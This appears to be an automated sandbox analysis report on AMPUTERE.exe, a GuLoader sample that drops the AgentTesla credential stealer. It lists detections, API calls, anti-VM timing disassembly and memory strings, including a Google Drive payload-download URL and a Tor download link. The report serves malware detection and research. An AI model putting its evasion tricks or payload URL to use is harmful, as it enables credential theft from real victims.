Play interactive tour

Edit tour

Analysis Report AMPUTERE.exe

Overview

General Information

Sample Name:	AMPUTERE.exe
Analysis ID:	379730
MD5:	f2fa3c87de32858f1244fb352873f399
SHA1:	3d6f6d635639c689a8e4709ccb379500b4e76096
SHA256:	2beda3caff1f808814294dca346cbe62ad229272d54696fe75e99388a73ff3cc
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Machine Learning detection for sample

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

AMPUTERE.exe (PID: 6608 cmdline: 'C:\Users\user\Desktop\AMPUTERE.exe' MD5: F2FA3C87DE32858F1244FB352873F399)

RegAsm.exe (PID: 6044 cmdline: 'C:\Users\user\Desktop\AMPUTERE.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 6044	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 6044	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6044	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: AMPUTERE.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: AMPUTERE.exe	Virustotal: Detection: 44%			Perma Link
Source: AMPUTERE.exe	ReversingLabs: Detection: 68%

Machine Learning detection for sample

Show sources

Source: AMPUTERE.exe

Joe Sandbox ML: detected

Source: AMPUTERE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.6:49747 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: doc-14-a0-docs.googleusercontent.com

Source: RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	String found in binary or memory: http://CFlLIU.com
Source: RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=1YqpUxJBnjokc5FJGT-8XzuYbR97RtVG2
Source: RegAsm.exe, 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown

HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.6:49747 version: TLS 1.2

Source: AMPUTERE.exe, 00000000.00000002.811048059.00000000005EA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\AMPUTERE.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107349 NtQueryInformationProcess,	19_2_01107349
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01106E63 NtProtectVirtualMemory,	19_2_01106E63
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_0110752F NtQueryInformationProcess,	19_2_0110752F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_0110755B NtQueryInformationProcess,	19_2_0110755B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_0110759F NtQueryInformationProcess,	19_2_0110759F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107583 NtQueryInformationProcess,	19_2_01107583
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011075BB NtQueryInformationProcess,	19_2_011075BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011075E7 NtQueryInformationProcess,	19_2_011075E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107417 NtQueryInformationProcess,	19_2_01107417
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107437 NtQueryInformationProcess,	19_2_01107437
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107457 NtQueryInformationProcess,	19_2_01107457
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107477 NtQueryInformationProcess,	19_2_01107477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011074A0 NtQueryInformationProcess,	19_2_011074A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011074DF NtQueryInformationProcess,	19_2_011074DF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_0110770C NtQueryInformationProcess,	19_2_0110770C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107747 NtQueryInformationProcess,	19_2_01107747
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_0110777F NtQueryInformationProcess,	19_2_0110777F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107363 NtQueryInformationProcess,	19_2_01107363
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107384 NtQueryInformationProcess,	19_2_01107384
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011073B3 NtQueryInformationProcess,	19_2_011073B3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011073CB NtQueryInformationProcess,	19_2_011073CB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011073EB NtQueryInformationProcess,	19_2_011073EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107603 NtQueryInformationProcess,	19_2_01107603
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01106E22 NtProtectVirtualMemory,	19_2_01106E22
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01106E47 NtProtectVirtualMemory,	19_2_01106E47
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107663 NtQueryInformationProcess,	19_2_01107663
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011076AB NtQueryInformationProcess,	19_2_011076AB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011076CB NtQueryInformationProcess,	19_2_011076CB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_1DC8B0BA NtQuerySystemInformation,	19_2_1DC8B0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_1DC8B089 NtQuerySystemInformation,	19_2_1DC8B089

Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409418	0_2_00409418
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A862	0_2_0040A862
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A078	0_2_0040A078
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A478	0_2_0040A478
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040943F	0_2_0040943F
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409886	0_2_00409886
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004094B0	0_2_004094B0
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A101	0_2_0040A101
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A50A	0_2_0040A50A
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409D0C	0_2_00409D0C
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409918	0_2_00409918
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409DED	0_2_00409DED
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409588	0_2_00409588
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A193	0_2_0040A193
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A595	0_2_0040A595
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004099A6	0_2_004099A6
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004095BE	0_2_004095BE
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409649	0_2_00409649
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A628	0_2_0040A628
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409A2A	0_2_00409A2A
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409A2C	0_2_00409A2C
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409E30	0_2_00409E30
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A2C0	0_2_0040A2C0
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409EC4	0_2_00409EC4
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004096D5	0_2_004096D5
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A6FC	0_2_0040A6FC
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A6B3	0_2_0040A6B3
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409ABB	0_2_00409ABB
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A746	0_2_0040A746
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409B50	0_2_00409B50
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040A356	0_2_0040A356
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409F5F	0_2_00409F5F
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409762	0_2_00409762
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409BE2	0_2_00409BE2
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00409FE9	0_2_00409FE9
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004097F4	0_2_004097F4

Source: AMPUTERE.exe, 00000000.00000002.811248602.0000000002200000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenameuser32j% vs AMPUTERE.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: AMPUTERE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/0@1/1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_1DC8AF3E AdjustTokenPrivileges,		19_2_1DC8AF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_1DC8AF07 AdjustTokenPrivileges,		19_2_1DC8AF07

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1212:120:WilError_01

Source: C:\Users\user\Desktop\AMPUTERE.exe

File created: C:\Users\user\AppData\Local\Temp\~DF371BB4A539764BA1.TMP

Jump to behavior

Source: AMPUTERE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\AMPUTERE.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\AMPUTERE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: AMPUTERE.exe	Virustotal: Detection: 44%
Source: AMPUTERE.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\AMPUTERE.exe 'C:\Users\user\Desktop\AMPUTERE.exe'
Source: C:\Users\user\Desktop\AMPUTERE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\AMPUTERE.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AMPUTERE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\AMPUTERE.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6044, type: MEMORY

Source: AMPUTERE.exe

Static PE information: real checksum: 0x255bc should be: 0x22e67

Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040306C push esi; iretd	0_2_00403078
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040307A push esi; ret	0_2_0040307C
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004034DD push ebp; ret	0_2_004034DE
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004058EE push esi; ret	0_2_00405918
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040888A push esi; ret	0_2_0040888C
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_004071F6 push esi; retf	0_2_0040723C
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_0040723D push esi; ret	0_2_00407280
Source: C:\Users\user\Desktop\AMPUTERE.exe	Code function: 0_2_00404BEA push esi; iretd	0_2_00404BEC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01104B84 push dword ptr [ebp+77h]; ret	19_2_01104B89
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01107384 push cs; retn EB1Ah	19_2_011073A0

Source: C:\Users\user\Desktop\AMPUTERE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AMPUTERE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AMPUTERE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_01103317		19_2_01103317
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 19_2_011032A2		19_2_011032A2

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 00000000005261EC second address: 00000000005261EC instructions:
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 0000000000526246 second address: 0000000000526246 instructions:
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 0000000000526315 second address: 0000000000526315 instructions:
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 00000000005233AC second address: 00000000005233AC instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F99848EE8F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e test dh, ch 0x00000020 add edi, edx 0x00000022 test ecx, ebx 0x00000024 dec ecx 0x00000025 jmp 00007F99848EE90Ah 0x00000027 test bl, bl 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F99848EE8A5h 0x0000002e push ecx 0x0000002f jmp 00007F99848EE90Ah 0x00000031 cmp bh, ah 0x00000033 cmp ah, bh 0x00000035 call 00007F99848EE93Fh 0x0000003a call 00007F99848EE908h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 0000000000526BD4 second address: 0000000000526BD4 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFB8h 0x0000000d jne 00007F99848EE922h 0x0000000f cmp ecx, 00002000h 0x00000015 jne 00007F99848EE7C6h 0x0000001b inc ecx 0x0000001c inc ebx 0x0000001d test cl, dl 0x0000001f cmp dword ptr [ebx], 9090C350h 0x00000025 jne 00007F99848EE926h 0x00000027 cmp edx, 257E6A7Fh 0x0000002d cmp edx, dword ptr [ebx] 0x0000002f jne 00007F99848EE916h 0x00000031 test dh, ch 0x00000033 cmp byte ptr [ebx], FFFFFFE8h 0x00000036 jne 00007F99848EE95Bh 0x00000038 cmp edi, 1B7EF1A7h 0x0000003e pushad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\AMPUTERE.exe	RDTSC instruction interceptor: First address: 00000000005209F7 second address: 00000000005209F7 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000001101F83 second address: 0000000001101F83 instructions:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

